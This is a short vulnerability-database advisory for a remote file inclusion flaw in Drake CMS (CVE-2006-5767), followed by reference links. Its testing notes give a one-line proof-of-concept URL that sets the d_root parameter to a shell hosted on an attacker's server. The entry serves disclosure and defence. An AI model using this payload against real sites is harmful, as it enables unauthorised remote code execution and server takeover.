Drake CMS includes/xhtml.php d_root Variable Remote File Inclusion

2006-11-04T04:37:42
ID OSVDB:31245
Type osvdb
Reporter OSVDB
Modified 2006-11-04T04:37:42

Description

Manual Testing Notes

http://[target]/[path]/includes/xhtml.php?d_root=http://[attacker]/shell?

References:

Vendor Specific News/Changelog Entry: http://sourceforge.net/forum/forum.php?forum_id=636860 Mail List Post: http://attrition.org/pipermail/vim/2006-December/001202.html ISS X-Force ID: 30021 Generic Exploit URL: http://www.milw0rm.com/exploits/2713 FrSIRT Advisory: ADV-2006-4345 CVE-2006-5767 Bugtraq ID: 20914